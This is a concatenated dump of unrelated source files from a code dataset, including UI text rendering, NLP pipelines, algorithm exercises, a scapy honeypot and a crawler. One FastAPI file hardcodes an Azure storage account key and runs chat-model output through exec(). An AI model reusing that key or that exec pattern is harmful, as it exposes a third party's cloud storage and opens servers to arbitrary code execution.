None:\n    # initial rendering state\n    font = ui.NORMAL\n    fg = ui.FG\n    bg = ui.BG\n    offset_x = TEXT_MARGIN_LEFT\n    offset_y = TEXT_HEADER_HEIGHT + TEXT_LINE_HEIGHT\n    OFFSET_X_MAX = ui.WIDTH\n    OFFSET_Y_MAX = TEXT_HEADER_HEIGHT + TEXT_LINE_HEIGHT * max_lines\n    FONTS = (ui.NORMAL, ui.BOLD, ui.MONO, ui.MONO_BOLD)\n\n    # sizes of common glyphs\n    SPACE = ui.display.text_width(\" \", font)\n    DASH = ui.display.text_width(\"-\", ui.BOLD)\n    ELLIPSIS = ui.display.text_width(\"...\", ui.BOLD)\n\n    for word_index, word in enumerate(words):\n        has_next_word = word_index < len(words) - 1\n\n        if isinstance(word, int):\n            if word in [BR, BR_HALF]:\n                # line break or half-line break\n                if offset_y >= OFFSET_Y_MAX:\n                    ui.display.text(offset_x, offset_y, \"...\", ui.BOLD, ui.GREY, bg)\n                    return\n                offset_x = TEXT_MARGIN_LEFT\n                offset_y += TEXT_LINE_HEIGHT if word == BR else TEXT_LINE_HEIGHT_HALF\n            elif word in FONTS:\n                # change of font style\n                font = word\n            else:\n                # change of foreground color\n                fg = word\n            continue\n\n        width = ui.display.text_width(word, font)\n\n        while offset_x + width > OFFSET_X_MAX or (\n            has_next_word and offset_y >= OFFSET_Y_MAX\n        ):\n            beginning_of_line = offset_x == TEXT_MARGIN_LEFT\n            word_fits_in_one_line = width < (OFFSET_X_MAX - TEXT_MARGIN_LEFT)\n            if (\n                offset_y < OFFSET_Y_MAX\n                and word_fits_in_one_line\n                and not beginning_of_line\n            ):\n                # line break\n                offset_x = TEXT_MARGIN_LEFT\n                offset_y += TEXT_LINE_HEIGHT\n                break\n            # word split\n            if offset_y < OFFSET_Y_MAX:\n                split = \"-\"\n                splitw = DASH\n            else:\n                split = \"...\"\n                splitw = ELLIPSIS\n            # find span that fits\n            for index in range(len(word) - 1, 0, -1):\n                letter = word[index]\n                width -= ui.display.text_width(letter, font)\n                if offset_x + width + splitw < OFFSET_X_MAX:\n                    break\n            else:\n                
index = 0\n span = word[:index]\n # render word span\n ui.display.text(offset_x, offset_y, span, font, fg, bg)\n ui.display.text(offset_x + width, offset_y, split, ui.BOLD, ui.GREY, bg)\n # line break\n if offset_y >= OFFSET_Y_MAX:\n return\n offset_x = TEXT_MARGIN_LEFT\n offset_y += TEXT_LINE_HEIGHT\n # continue with the rest\n word = word[index:]\n width = ui.display.text_width(word, font)\n\n # render word\n ui.display.text(offset_x, offset_y, word, font, fg, bg)\n\n if new_lines and has_next_word:\n # line break\n if offset_y >= OFFSET_Y_MAX:\n ui.display.text(offset_x, offset_y, \"...\", ui.BOLD, ui.GREY, bg)\n return\n offset_x = TEXT_MARGIN_LEFT\n offset_y += TEXT_LINE_HEIGHT\n else:\n # shift cursor\n offset_x += width\n offset_x += SPACE\n\n\nclass Text(ui.Widget):\n def __init__(\n self,\n header_text: str,\n header_icon: str = ui.ICON_DEFAULT,\n icon_color: int = ui.ORANGE_ICON,\n max_lines: int = TEXT_MAX_LINES,\n new_lines: bool = True,\n ):\n self.header_text = header_text\n self.header_icon = header_icon\n self.icon_color = icon_color\n self.max_lines = max_lines\n self.new_lines = new_lines\n self.content = []\n\n def normal(self, *content):\n self.content.append(ui.NORMAL)\n self.content.extend(content)\n\n def bold(self, *content):\n self.content.append(ui.BOLD)\n self.content.extend(content)\n\n def mono(self, *content):\n self.content.append(ui.MONO)\n self.content.extend(content)\n\n def mono_bold(self, *content):\n self.content.append(ui.MONO_BOLD)\n self.content.extend(content)\n\n def br(self):\n self.content.append(BR)\n\n def br_half(self):\n self.content.append(BR_HALF)\n\n def render(self):\n if self.tainted:\n ui.header(\n self.header_text,\n self.header_icon,\n ui.TITLE_GREY,\n ui.BG,\n self.icon_color,\n )\n render_text(self.content, self.new_lines, self.max_lines)\n self.tainted = False\n","repo_name":"trezor/trezor-core","sub_path":"src/trezor/ui/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","stars":353,"dataset":"github-code","pt":"47"} +{"seq_id":"36976625484","text":"import os\r\nfrom fastapi import FastAPI, UploadFile, File\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\nfrom pydantic import BaseModel\r\nfrom azure.storage.blob import BlobServiceClient\r\nfrom io import BytesIO\r\nimport pandas as pd\r\nimport glob\r\nimport vertexai\r\nfrom vertexai.preview.language_models import ChatModel\r\nfrom google.auth import credentials\r\nfrom google.oauth2 import service_account\r\nimport google.cloud.aiplatform as aiplatform\r\nimport json\r\nimport io\r\nimport contextlib\r\n\r\n\r\napp = FastAPI()\r\n\r\n# Add CORS middleware\r\napp.add_middleware(\r\n CORSMiddleware,\r\n allow_origins=[\"*\"],\r\n allow_credentials=True,\r\n allow_methods=[\"*\"],\r\n allow_headers=[\"*\"],\r\n)\r\n\r\nclass Prompt(BaseModel):\r\n prompt: str\r\n filename: str\r\n\r\n@app.on_event(\"startup\")\r\nasync def startup_event():\r\n # Load the service account json file\r\n with open(\"participant-sa-26-ghc-025.json\") as f:\r\n service_account_info = json.load(f)\r\n\r\n my_credentials = service_account.Credentials.from_service_account_info(\r\n service_account_info\r\n )\r\n\r\n # Initialize Google AI Platform with project details and credentials\r\n aiplatform.init(credentials=my_credentials)\r\n\r\n with open(\"participant-sa-26-ghc-025.json\", encoding=\"utf-8\") as f:\r\n project_json = json.load(f)\r\n project_id = project_json[\"project_id\"]\r\n\r\n # Initialize Vertex AI with 
project and location\r\n vertexai.init(project=project_id, location=\"us-central1\")\r\n\r\ndef clean_python_code(code):\r\n # Remove Markdown backticks\r\n code = code.replace(\"```python\", \"\").replace(\"```\", \"\")\r\n\r\n # Split the code by line breaks\r\n lines = code.split('\\n')\r\n\r\n # Remove only trailing whitespace from each line to preserve indentation\r\n lines = [line.rstrip() for line in lines]\r\n\r\n # Remove empty lines\r\n lines = [line for line in lines if line]\r\n\r\n # Join the lines back together\r\n cleaned_code = '\\n'.join(lines)\r\n\r\n return cleaned_code\r\n\r\n\r\n\r\n@app.post(\"/analyze\")\r\nasync def analyze_data(prompt: Prompt):\r\n # Azure Blob configurations\r\n connection_string = 'DefaultEndpointsProtocol=https;AccountName=mosistorage;AccountKey=E0h0nPOvoHKf50HoBg4vP7BBBTJ4eCnqqOWlURTbXiA5fbT/MuE0qcxUBDlNWdihlI76MzqQSaB3+ASt4/vpbg==;EndpointSuffix=core.windows.net'\r\n container_name = 'mosicsv'\r\n\r\n # Initialize BlobServiceClient\r\n blob_service_client = BlobServiceClient.from_connection_string(connection_string)\r\n\r\n # Download the CSV file from Azure Blob Storage\r\n csv_blob_client = blob_service_client.get_blob_client(container=container_name, blob=prompt.filename)\r\n csv_data = csv_blob_client.download_blob().readall()\r\n\r\n # Get the current directory path\r\n current_directory = os.getcwd()\r\n\r\n # Define the file destination path\r\n file_destination = os.path.join(current_directory, 'mosicsv', prompt.filename)\r\n\r\n # Create the 'mosicsv' directory if it doesn't exist\r\n os.makedirs(os.path.dirname(file_destination), exist_ok=True)\r\n\r\n # Save the downloaded CSV file to the file destination\r\n with open(file_destination, 'wb') as file:\r\n file.write(csv_data)\r\n\r\n # Convert the CSV file to a pandas DataFrame\r\n df = pd.read_csv(file_destination)\r\n\r\n # Get the head of the data as a preview\r\n data_preview = df.head().to_dict()\r\n\r\n chat_model = ChatModel.from_pretrained(\"chat-bison@001\")\r\n parameters = {\r\n \"temperature\": 0.8,\r\n \"max_output_tokens\": 1024,\r\n \"top_p\": 0.8,\r\n \"top_k\": 40,\r\n }\r\n chat = chat_model.start_chat()\r\n print(\"Data Preview:\", data_preview)\r\n print(\"File Destination:\", file_destination)\r\n\r\n message_input = \"Here's the head of my data: \" + str(data_preview) + \". The CSV file is located at: \" + file_destination + \". Write only python code. 
Can you analyze it for me by \" + prompt.prompt\r\n\r\n chat_response = chat.send_message(message_input)\r\n\r\n # Clean the Python code\r\n cleaned_code = clean_python_code(chat_response.text)\r\n\r\n print(\"Uncleaned Code:\", chat_response.text)\r\n print(\"Cleaned code:\", cleaned_code)\r\n # Write cleaned Python code to a file\r\n python_code_filepath = \"temp.py\"\r\n with open(python_code_filepath, 'w') as python_file:\r\n python_file.write(cleaned_code)\r\n\r\n # Create a string buffer\r\n output = io.StringIO()\r\n # Initialize result variable\r\n result = None\r\n # Redirect standard output to the string buffer\r\n with contextlib.redirect_stdout(output):\r\n try:\r\n exec(cleaned_code)\r\n # If a .png file has been generated in the current directory, upload it to Azure\r\n if glob.glob(\"*.png\"):\r\n image_file = glob.glob(\"*.png\")[0]\r\n image_blob_client = blob_service_client.get_blob_client(container=container_name, blob=image_file)\r\n with open(image_file, \"rb\") as data:\r\n image_blob_client.upload_blob(data)\r\n os.remove(image_file)\r\n result = {\"image_url\": image_blob_client.url}\r\n except Exception as e:\r\n result = {\"error\": str(e)}\r\n\r\n # Get the print output\r\n printed_output = output.getvalue().strip()\r\n # Clean up the temporary files\r\n os.remove(python_code_filepath)\r\n\r\n if result is None:\r\n result = {\"text_response\": chat_response.text}\r\n\r\n # Add the printed_output to the result\r\n result[\"printed_output\"] = printed_output\r\n return result\r\n\r\nif __name__ == \"__main__\":\r\n import uvicorn\r\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\r\n","repo_name":"MarkNwilliam/Semilog","sub_path":"backend/lablab.py","file_name":"lablab.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"73116814863","text":"# -*- coding: utf-8 -*-\r\n#This file includes pipeline to prepare the document for analysis\r\n#functions used here can be found in prep_utilities.py file\r\n\r\nfrom src.prep_utilities import *\r\n\r\n#Pipeline for data prep\r\ndef prep_docs(doc, speaker_attributes, fix_contract = True, del_stop = True, lemmatize = True, print_progress = True, min_size = 1, min_true_size = 1):\r\n \"\"\"\r\n This function performs the full pipeline to prepare the data taken from Quotebank\r\n \r\n Parameters\r\n ----------\r\n doc : pandas.DataFrame\r\n Dataframe with the data to pre-process.\r\n speaker_attributes : pandas.DataFrame\r\n Dataframe with informations on the speakers.\r\n fix_contract : bool\r\n If true, expand contractions (don't -> do not; I'm -> I am;...)\r\n del_stop : bool\r\n If true, remove all stopwords.\r\n lemmatize : bool\r\n If true, lemmatize all words.\r\n \r\n Returns\r\n -------\r\n copy_doc : pandas.DataFrame\r\n Result of the data provided after having passed through the whole pipeline.\r\n \"\"\"\r\n \r\n # Delete rows with 'None' speaker\r\n if print_progress: print(\"Deleting rows with 'None' speaker...\")\r\n copy_doc = doc[doc['speaker'] != 'None']\r\n\r\n # get date in YYYY-MM format\r\n if print_progress: print(\"Simplifying date column...\")\r\n copy_doc['date'] = copy_doc['date'].apply(lambda x: get_yyyy_mm(x))\r\n\r\n # prepare clean tokens\r\n if print_progress: print(\"Tokenizing quotes...\")\r\n copy_doc['tokens'] = copy_doc['quotation'].apply(\r\n lambda x: prep_tokens_row(x, fix_contract, del_stop, lemmatize))\r\n\r\n # filter out unnecessary rows (by number of words/true words)\r\n if 
print_progress: print(\"Filtering rows...\")\r\n copy_doc = filter_quotes(copy_doc, min_size, min_true_size)\r\n\r\n # get domain names\r\n if print_progress: print(\"Getting url domains...\")\r\n copy_doc['websites'] = copy_doc['urls'].apply(lambda x: get_website(x))\r\n copy_doc.drop(columns='urls', inplace=True)\r\n\r\n # get the gender of the speaker\r\n if print_progress: print(\"Getting genders...\")\r\n copy_doc['gender'] = copy_doc['qids'].apply(lambda x: find_gender(x, speaker_attributes))\r\n\r\n # Drop rows with gender = 'None'\r\n copy_doc = copy_doc[copy_doc['gender'].apply(lambda x: type(x)) != type(None)]\r\n\r\n return copy_doc\r\n","repo_name":"epfl-ada/ada-2021-project-madam","sub_path":"src/prep_pipeline.py","file_name":"prep_pipeline.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25545483865","text":"import os\nimport xml.etree.cElementTree as ET\nfrom typing import List, Optional, Iterable, Callable, Tuple, NamedTuple, Set\n\nfrom nltk.corpus import wordnet as wn\nfrom xml.dom import minidom\n\n\ndef wn_sense_key_to_id(sense_key):\n synset = wn.lemma_from_key(sense_key).synset()\n return 'wn:' + str(synset.offset()).zfill(8) + synset.pos()\n\n\n_wn2bn = {}\n_bn2wn = {}\n\n\nwith open('data/kb-mappings/bn2wn.txt') as f:\n for line in f:\n line = line.strip()\n parts = line.split('\\t')\n _bn2wn[parts[0]] = parts[2]\n _wn2bn[parts[2]] = parts[0]\n\n\ndef wn_id2bn_id(wn_id):\n return _wn2bn[wn_id]\n\n\ndef bn_id2wn_id(bn_id):\n return _bn2wn[bn_id]\n\n\n_to_bn_id_cache = {}\n\n\ndef to_bn_id(key):\n\n if key.startswith('bn:'):\n key_type = 'bn_id'\n transform = lambda x: x\n elif key.startswith('wn:'):\n key_type = 'wn_id'\n transform = lambda x: wn_id2bn_id(x)\n else:\n key_type = 'sense_key'\n transform = lambda x: to_bn_id(wn_sense_key_to_id(x).replace('s', 'a'))\n\n if key_type not in _to_bn_id_cache:\n _to_bn_id_cache[key_type] = {}\n\n if key not in _to_bn_id_cache[key_type]:\n _to_bn_id_cache[key_type][key] = transform(key)\n\n return _to_bn_id_cache[key_type][key]\n\n\nclass AnnotatedToken(NamedTuple):\n text: str\n pos: Optional[str] = None\n lemma: Optional[str] = None\n\n\nclass WSDInstance(NamedTuple):\n annotated_token: AnnotatedToken\n instance_id: Optional[str]\n labels: Optional[List[str]]\n\n\ndef read_from_raganato(\n xml_path: str,\n key_path: Optional[str] = None,\n instance_transform: Optional[Callable[[WSDInstance], WSDInstance]] = None\n) -> Iterable[Tuple[str, str, List[WSDInstance]]]:\n\n def read_by_text_iter(xml_path: str):\n\n it = ET.iterparse(xml_path, events=('start', 'end'))\n _, root = next(it)\n\n for event, elem in it:\n if event == 'end' and elem.tag == 'text':\n document_id = elem.attrib['id']\n for sentence in elem:\n sentence_id = sentence.attrib['id']\n for word in sentence:\n yield document_id, sentence_id, word\n\n root.clear()\n\n mapping = {}\n\n if key_path is not None:\n with open(key_path) as f:\n for line in f:\n line = line.strip()\n wsd_instance, *labels = line.split(' ')\n mapping[wsd_instance] = labels\n\n last_seen_document_id = None\n last_seen_sentence_id = None\n\n for document_id, sentence_id, element in read_by_text_iter(xml_path):\n\n if last_seen_sentence_id != sentence_id:\n\n if last_seen_sentence_id is not None:\n yield last_seen_document_id, last_seen_sentence_id, sentence\n\n sentence = []\n last_seen_document_id = document_id\n last_seen_sentence_id = sentence_id\n\n annotated_token = 
AnnotatedToken(\n text=element.text,\n pos=element.attrib.get('pos', None),\n lemma=element.attrib.get('lemma', None)\n )\n\n wsd_instance = WSDInstance(\n annotated_token=annotated_token,\n instance_id=None if element.tag == 'wf' or element.attrib['id'] not in mapping else element.attrib['id'],\n labels=None if element.tag == 'wf' or element.attrib['id'] not in mapping else mapping[element.attrib['id']]\n )\n\n if instance_transform is not None:\n wsd_instance = instance_transform(wsd_instance)\n\n sentence.append(wsd_instance)\n\n yield last_seen_document_id, last_seen_sentence_id, sentence\n\n\nclass RaganatoBuilder:\n\n def __init__(self, lang: Optional[str] = None, source: Optional[str] = None):\n self.corpus = ET.Element('corpus')\n self.current_text_section = None\n self.current_sentence_section = None\n self.gold_senses = []\n\n if lang is not None:\n self.corpus.set('lang', lang)\n\n if source is not None:\n self.corpus.set('source', source)\n\n def open_text_section(self, text_id: str, text_source: str = None):\n text_section = ET.SubElement(self.corpus, 'text')\n text_section.set('id', text_id)\n if text_source is not None:\n text_section.set('source', text_source)\n self.current_text_section = text_section\n\n def open_sentence_section(self, sentence_id: str):\n sentence_section = ET.SubElement(self.current_text_section, 'sentence')\n sentence_id = self.compute_id([self.current_text_section.attrib['id'], sentence_id])\n sentence_section.set('id', sentence_id)\n self.current_sentence_section = sentence_section\n\n def add_annotated_token(self, token: str, lemma: str, pos: str, instance_id: Optional[str] = None, labels: Optional[List[str]] = None):\n if instance_id is not None and labels is not None:\n token_element = ET.SubElement(self.current_sentence_section, 'instance')\n token_id = self.compute_id([self.current_sentence_section.attrib['id'], instance_id])\n token_element.set('id', token_id)\n self.gold_senses.append((token_id, ' '.join(labels)))\n else:\n token_element = ET.SubElement(self.current_sentence_section, 'wf')\n token_element.set('lemma', lemma)\n token_element.set('pos', pos)\n token_element.text = token\n\n @staticmethod\n def compute_id(chain_ids: List[str]) -> str:\n return '.'.join(chain_ids)\n\n def store(self, data_output_path: str, labels_output_path: str, prettify: bool = True):\n self.__store_xml(data_output_path, prettify)\n self.__store_labels(labels_output_path)\n\n def __store_xml(self, output_path: str, prettify: bool):\n corpus_writer = ET.ElementTree(self.corpus)\n with open(output_path, 'wb') as f_xml:\n corpus_writer.write(f_xml, encoding='UTF-8', xml_declaration=True)\n if prettify:\n dom = minidom.parse(output_path)\n pretty_xml = dom.toprettyxml()\n with open(output_path, 'w') as f_xml:\n f_xml.write(pretty_xml)\n\n def __store_labels(self, output_path: str):\n with open(output_path, 'w') as f_labels:\n for gold_sense in self.gold_senses:\n f_labels.write(' '.join(gold_sense))\n f_labels.write('\\n')\n\n\ndef expand_raganato_path(path: str) -> Tuple[str, str]:\n return f'{path}.data.xml', f'{path}.gold.key.txt'\n\n","repo_name":"edobobo/transformers-wsd","sub_path":"src/utils/wsd.py","file_name":"wsd.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"38458231755","text":"def bfs(s1,s2,e1,e2):\n q=[]\n visited[s1][s2]=True\n q.append((s1,s2,0))\n while q:\n s1,s2,tmp=q.pop(0)\n if s1==e1 and s2==e2:\n return tmp\n for dx,dy in 
[(-2,1),(-1,2),(1,2),(2,1),(2,-1),(1,-2),(-1,-2),(-2,-1)]:\n nx,ny=s1+dx,s2+dy\n\n if 0<=nxalist[i+1]:\n #temp = alist[i]\n #alist[i] = alist[i+1]\n #alist[i+1] = temp\n\n#alist = [54,26,93,17,77,31,44,55,20]\n#bubbleSort(alist)\n#print(alist)\n\n\nprint (\"############### binary sort ###########\")\nalist = [15,20,1,12,35,10]\nfor num in range(len(alist)-1,0,-1):\n for i in range(num):\n print(i)\n if alist[i]>alist[i+1]:\n temp = alist[i+1]\n alist[i+1] = alist[i]\n alist[i] = temp\nprint(alist)\nprint (\"#\"*20)\n\ndata = alist\nvalue = 15 \n\nhigh = len(data)-1\nlow = 0 \n\nflag = False\nprint (low,high)\nwhile (low<=high):\n mid = int((high+low)/2)\n print (data[mid])\n if data[mid] == value:\n print(\"found\")\n flag = True\n break\n if value < data[mid]:\n high = mid-1\n else:\n low = mid+1\nif not flag:\n print(\"not found\")\n\n\n\ndef bubblesort (data,low,high):\n value = 11\n mid = int((high+low)/2)\n if data[mid] == value:\n print(\"xfound\")\n return\n if low==high or high TrainingRepository:\n \"\"\"A fixture for a training repository.\"\"\"\n return TrainingDbRepository(database)\n\n\n@pytest.fixture\ndef coach_repo(database: Database) -> CoachRepository:\n \"\"\"A fixture for a coach repository.\"\"\"\n return CoachDbRepository(database)\n\n\n@pytest.fixture\ndef definition_repo(database: Database) -> TrainingDefinitionRepository:\n \"\"\"A fixture for a training definition repository.\"\"\"\n return TrainingDefinitionDbRepository(database)\n\n\n@pytest.fixture\ndef team_repo(database: Database) -> TeamRepository:\n \"\"\"A fixture for a team repository.\"\"\"\n return TeamDbRepository(database)\n\n\n@pytest.fixture\nasync def coach(\n database: Database, context: Context, coach_repo: CoachRepository\n) -> CoachEntity:\n \"\"\"A fixture for a coach.\"\"\"\n return await coach_repo.get_by_id(CoachIdentifier(context.get(\"coaches\")[0].id))\n\n\n@pytest.fixture\nasync def team(\n database: Database, context: Context, team_repo: TeamRepository\n) -> TeamEntity:\n \"\"\"A fixture for a team repository.\"\"\"\n teams_iterator = team_repo.get_by_ids(TeamIdentifier(context.get(\"teams\")[0].id))\n return await anext(teams_iterator)\n\n\n@pytest.fixture\nasync def command(coach: CoachEntity, team: TeamEntity) -> CreateTrainingCommand:\n \"\"\"A fixture for a training entity.\"\"\"\n start_date = LocalTimestamp.create_now()\n return CreateTrainingCommand(\n start_date=str(start_date),\n end_date=str(start_date.add_delta(hours=1)),\n active=True,\n cancelled=False,\n location=\"\",\n texts=[\n TextCommand(\n locale=\"en\",\n format=\"md\",\n title=\"Test training\",\n content=\"This is a test\",\n summary=\"This is a test\",\n )\n ],\n coaches=[Coach(id=coach.id.value, head=True, present=False, payed=False)],\n teams=[team.id.value],\n definition=None,\n remark=\"Created with test_create_training\",\n )\n\n\nasync def test_create_training(\n command: CreateTrainingCommand,\n training_repo: TrainingRepository,\n definition_repo: TrainingDefinitionRepository,\n coach_repo: CoachRepository,\n team_repo: TeamRepository,\n owner: Owner,\n):\n \"\"\"Test the use case \"Create Training\".\"\"\"\n training = await CreateTraining(\n training_repo, definition_repo, coach_repo, team_repo, owner\n ).execute(command)\n\n assert training is not None, \"There should be a 
training\"\n","repo_name":"fbraem/kwai","sub_path":"backend/src/tests/modules/training/test_create_training.py","file_name":"test_create_training.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"73716645262","text":"import time\n\nfrom simpleai.search import astar, greedy\n\nfrom cython_custom import Coordinate\nfrom cython_path_search import RoutePlanningProblem\n\nif __name__ == '__main__':\n time_start = time.time()\n\n map_info = (199, 199, 10)\n buildings = [(1, 1, 198, 199, 0, 10)]\n start = (0, 0, 0)\n end = (199, 199, 10)\n\n result = None\n count = 1\n\n problem = RoutePlanningProblem(\n map_info=map_info,\n buildings=buildings)\n for _ in range(count):\n problem.set_config(start=Coordinate(*start), end=Coordinate(*end))\n result = astar(problem, graph_search=True)\n\n time_end = time.time()\n\n path = [(c.x, c.y, c.z) for (_, c) in result.path()]\n print(result.state)\n print(path)\n print('Time: %s s' % ((time_end - time_start) / count))\n","repo_name":"Boreaso/HikvisionChallenge","sub_path":"jpsp_boost/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13016079939","text":"#!/usr/local/bin/python3\r\nimport os\r\nfrom scapy import all\r\nfrom scapy.all import *\r\ndef packetcraft():\r\n print(\"Begining packet crafting:\")\r\n while True:\r\n os.system(\"iptables-legacy -A OUTPUT -p tcp -o eth0 --sport 1:65535 --tcp-flags RST RST -j DROP\")\r\n def packet(pkt):\r\n if pkt[TCP].flags == 2:\r\n if(str(pkt[TCP].dport)) == 22:\r\n print(\"SYN packet detected port : \" + str(pkt[TCP].sport) + \" from IP Src : \" + pkt[IP].src)\r\n send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport,ack=pkt[TCP].seq + 1, flags='SA'))\r\n elif(str(pkt[TCP].dport)) == \"445\":\r\n print(\"SYN packet detected port : \" + str(pkt[TCP].sport) + \" from IP Src : \" + pkt[IP].src)\r\n send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport,ack=pkt[TCP].seq + 1, flags='SA'))\r\n sniff(iface=\"eth0\", prn=packet, filter=\"tcp[0xd]&18=2\",count=10)\r\n os.system(\"iptables-legacy -D OUTPUT -p tcp -o eth0 --sport 1:65535 --tcp-flags RST RST -j DROP\")\r\n \r\ndef logports():\r\n print(\"Starting T-Shark capture on ports 22 and 445:\")\r\n os.system(\"sudo tshark -i eth0 -c 10 -f \\\"port 22 or port 445\\\" -w /home/capture/mycapt.pcap -F libpcap\")\r\n print(\"T-Shark is now running\")\r\n \r\ndef main():\r\n print(\"Starting HoneyPot Script\")\r\n logports()\r\n packetcraft()\r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main()\r\n except KeyboardInterrupt:\r\n print('Exiting as user request...')","repo_name":"1md3nd/H0n3yP0t","sub_path":"capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"295540774","text":"#!/usr/bin/env python3\nimport sys\nimport re\nfrom re import finditer\n\nsequences = []\n\n\ntry:\n if len(sys.argv) == 3:\n inputFile = sys.argv[1]\n outputFile = sys.argv[2]\n else:\n raise TypeError\nexcept:\n sys.exit('Reikia įvesti dviejų failų pavadinimus')\n\n# Visos sekos vienodo ilgio, inicializuojame sąrašus nuliais\ndef calculateFrequencies(sequences):\n sequenceLength = len(sequences[0])\n frequencyMatrix = {\n 'A' : [0] * sequenceLength,\n 'C' : [0] * 
def findConsensus(sequenceLength, frequencyMatrix):\n    consensus = \"\"\n    # From the frequency matrix, count which nucleotide occurs most often\n    # at each position\n    for i in range(sequenceLength):\n        maxFrequency = -1\n        mostFrequentNucleotide = None\n        for nucleotide in \"ATGC\":\n            # Compare each one against the highest count seen so far\n            if frequencyMatrix[nucleotide][i] > maxFrequency:\n                maxFrequency = frequencyMatrix[nucleotide][i]\n                mostFrequentNucleotide = nucleotide\n            # If more than one nucleotide is the most frequent, the task says\n            # to write a '-' symbol (could not be identified)\n            elif frequencyMatrix[nucleotide][i] == maxFrequency:\n                mostFrequentNucleotide = '-'\n        # The most likely ancestor sequence is assembled from the most\n        # frequent nucleotides\n        consensus += mostFrequentNucleotide\n    return consensus\n\n\ntry:\n    with open(inputFile, 'r', encoding = 'utf-8') as input:\n        for match in finditer(r'^>.*$([^>]+)', input.read(), re.M | re.I):\n            # Remove the line separators\n            sequence = match.group(1).replace('\\n', '')\n            sequences.append(sequence)\n    frequencyMatrix = calculateFrequencies(sequences)\n    consensus = findConsensus(len(sequences[0]), frequencyMatrix)\n    with open(outputFile, 'w') as output:\n        output.write(consensus)\n\nexcept FileNotFoundError:\n    sys.exit(\"The input file does not exist\")\n\n","repo_name":"DaliaMasilionyte/Bioinf-varzybos","sub_path":"7uzdavinys/7uzdavinys.py","file_name":"7uzdavinys.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23792316787","text":"\"\"\"\ncode for reading different file formats\noutput are generators with dictionaries\n\"\"\"\n\nfrom os.path import splitext\n\nimport hashlib\nimport codecs\n\n\ndef open_file(file_name):\n    \"\"\"\n    returns a pair with the md5 of the file, and fitting generator for\n    iterating the file.\n    \"\"\"\n    #head,ext = splitext(file_name)\n    md5 = hashlib.md5()\n    #print head, ext\n    with open(file_name,'rb') as f: \n        for chunk in iter(lambda: f.read(128*md5.block_size), b''): \n            md5.update(chunk)\n    \n    #print md5.hexdigest()\n    if file_name.endswith(\".gt\"):\n        return (md5.hexdigest(), gt_generator(file_name))\n    elif file_name.endswith(\".egt\"):\n        return (md5.hexdigest(), egt_generator(file_name))\n    \ndef gt_generator(file):\n    with codecs.open(file, \"r\", \"utf-8\") as f:\n        for line in f:\n            tmp = line.split()\n            yield {\"loc\" : [float(tmp[1]), float(tmp[2])],#[lon, lat]\n                   \"tag\" : tmp[3:]}\n\ndef egt_generator(file):\n    with codecs.open(file, \"r\", \"utf-8\") as f:\n        for line in f:\n            tmp = line.split()\n            yield {\"loc\" : [float(tmp[1]), float(tmp[2])],\n                   \"id\" : int(tmp[3]),\n                   \"tag\" : tmp[4:]}\n","repo_name":"cseyda/Master-thesis","sub_path":"code/Python/file_input.py","file_name":"file_input.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"865387689","text":"#encoding='utf-8'\n\nimport json\nimport os\nimport pickle as pkl\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom utils import IdMap\n\nbase_url = 'http://cc.nankai.edu.cn'\ncur = 'http://cc.nankai.edu.cn'\ndoc_id_map = 
IdMap.IdMap() # doc to id\nmax_loop = 100\nnxt = []\ntot = 0\nurl_anc_map = {} # url to anctext\nurl_id_map = IdMap.IdMap() # url to id\nurl_list_map = {} # page link info\n\ndef get_html(url):\n # print(\"try to get: \", url)\n try:\n temp = requests.get(url, timeout=2)\n temp.encoding = 'utf-8'\n except:\n return None\n return temp\n\ndef write_result(html):\n soup = BeautifulSoup(html.text, 'lxml')\n addr = url_id_map.__getitem__(cur)\n # add code\n doc = open(os.path.join('data_dir', str(addr) + '.code'), 'w', encoding='utf-8')\n doc.write(html.text)\n doc.close()\n # url and anctext\n data = soup.select('a')\n pages = set()\n # url_anc.write(\"+++ now is : \" + cur + \"\\n\")\n for item in data:\n text = re.sub(\"[\\r \\n\\t]\", '', item.get_text())\n if text == None or text == '':\n continue\n url = item.get('href')\n if url == None or url == '' or re.search('java|void', url) != None:\n continue\n # add header\n if re.search('\\.cn|\\.com', url) == None:\n if re.match('http|https|www\\.', url) == None:\n if re.match('\\/', url) == None:\n url = '/' + url\n url = base_url + url\n if not re.search('\\.doc|\\.docx|\\.zip|\\.rar|\\.ppt|\\.pptx|\\.xlsx|\\.xls|\\.jpg|\\.png|\\.pdf|\\.md', url) == None \\\n or re.search('file|download', url) != None:\n if doc_id_map.__have__(url) == None:\n docid = doc_id_map.__getitem__(url)\n url_anc_map.setdefault(url, text)\n doc_url.write(text + \" \" + str(docid) + \"\\n\")\n continue\n if url_id_map.__have__(url) == None:\n urlid = url_id_map.__getitem__(url)\n nxt.append(url)\n url_anc.write(text + \" \" + str(urlid) + \"\\n\")\n url_anc_map.setdefault(url, text)\n urlid = url_id_map.__getitem__(url)\n pages.add(urlid)\n 